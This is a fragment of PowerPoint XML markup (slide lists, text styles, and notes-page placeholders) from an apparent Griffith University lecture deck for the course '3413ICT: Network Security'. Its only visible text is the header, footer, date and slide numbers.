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5"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId46"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="344" r:id="rId2"/>
    <p:sldId id="687" r:id="rId3"/>
    <p:sldId id="688" r:id="rId4"/>
    <p:sldId id="568" r:id="rId5"/>
    <p:sldId id="612" r:id="rId6"/>
    <p:sldId id="613" r:id="rId7"/>
    <p:sldId id="614" r:id="rId8"/>
    <p:sldId id="615" r:id="rId9"/>
    <p:sldId id="616" r:id="rId10"/>
    <p:sldId id="617" r:id="rId11"/>
    <p:sldId id="618" r:id="rId12"/>
    <p:sldId id="619" r:id="rId13"/>
    <p:sldId id="691" r:id="rId14"/>
    <p:sldId id="692" r:id="rId15"/>
    <p:sldId id="693" r:id="rId16"/>
    <p:sldId id="694" r:id="rId17"/>
    <p:sldId id="695" r:id="rId18"/>
    <p:sldId id="696" r:id="rId19"/>
    <p:sldId id="697" r:id="rId20"/>
    <p:sldId id="698" r:id="rId21"/>
    <p:sldId id="699" r:id="rId22"/>
    <p:sldId id="700" r:id="rId23"/>
    <p:sldId id="701" r:id="rId24"/>
    <p:sldId id="632" r:id="rId25"/>
    <p:sldId id="633" r:id="rId26"/>
    <p:sldId id="702" r:id="rId27"/>
    <p:sldId id="703" r:id="rId28"/>
    <p:sldId id="704" r:id="rId29"/>
    <p:sldId id="705" r:id="rId30"/>
    <p:sldId id="706" r:id="rId31"/>
    <p:sldId id="707" r:id="rId32"/>
    <p:sldId id="708" r:id="rId33"/>
    <p:sldId id="639" r:id="rId34"/>
    <p:sldId id="640" r:id="rId35"/>
    <p:sldId id="641" r:id="rId36"/>
    <p:sldId id="684" r:id="rId37"/>
    <p:sldId id="642" r:id="rId38"/>
    <p:sldId id="709" r:id="rId39"/>
    <p:sldId id="689" r:id="rId40"/>
    <p:sldId id="690" r:id="rId41"/>
    <p:sldId id="710" r:id="rId42"/>
    <p:sldId id="376" r:id="rId43"/>
    <p:sldId id="683" r:id="rId44"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6794500" cy="9931400"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-AU"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-8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00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0" d="100"/>
          <a:sy n="120" d="100"/>
        </p:scale>
        <p:origin x="-1312"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430"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="-1626"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2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Griffith University, School of ICT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3849688" y="0"/>
            <a:ext cx="294481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Times" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2014/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9434513"/>
            <a:ext cx="294481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Times" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>3413ICT: Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6149" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3849688" y="9434513"/>
            <a:ext cx="2944812"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r>
              <a:rPr lang="en-AU"/>
              <a:t>Lecture  - </a:t>
            </a:r>
            <a:fld id="{95D29A50-8D3D-4B0C-A02C-7E65DDEA2633}" type="slidenum">
              <a:rPr lang="en-AU"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10942431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2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Griffith University, School of ICT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3849688" y="0"/>
            <a:ext cx="294481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Times" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2014/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="742950"/>
            <a:ext cx="4965700" cy="3725863"/>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08050" y="4718050"/>
            <a:ext cx="4978400" cy="4470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1030" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9434513"/>
            <a:ext cx="294481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Times" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>3413ICT: Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3849688" y="9434513"/>
            <a:ext cx="2944812"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C872CD0-2F28-43DC-AEBB-AFEEC229716A}" type="slidenum">
              <a:rPr lang="en-AU"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="477001399"/>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hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Griffith University, School of ICT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0">
                <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>2014/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU">
              <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>3413ICT: Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU">
              <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E475D990-E557-4A90-9ACF-F4C54B68E188}" type="slidenum">
              <a:rPr lang="en-AU"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16389" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="744538"/>
            <a:ext cx="4965700" cy="3725862"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16390" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904875" y="4718050"/>
            <a:ext cx="4984750" cy="4468813"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-8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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58370" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ta-IN" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Header Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>Griffith University, School of ICT</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0"/>
              <a:t>2014/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>3413ICT: Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58374" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43296484-5FB7-4219-8A6A-D111F8413240}" type="slidenum">
              <a:rPr lang="en-AU"/>
              <a:pPr/>
              <a:t>2</a:t>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hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Griffith University, School of ICT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18434" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0">
                <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>2014/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU">
              <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>3413ICT: Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU">
              <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{65AE1838-4EF9-43DB-8E85-D4C09C382502}" type="slidenum">
              <a:rPr lang="en-AU"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="744538"/>
            <a:ext cx="4965700" cy="3725862"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18438" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904875" y="4718050"/>
            <a:ext cx="4984750" cy="4468813"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-8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hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Griffith University, School of ICT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22530" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ta-IN" smtClean="0">
                <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>2014/1</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU">
              <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>3413ICT: Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU">
              <a:latin typeface="Times" pitchFamily="-84" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5109B786-928E-458E-8440-D7E6BBC9C8B5}" type="slidenum">
              <a:rPr lang="en-AU"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
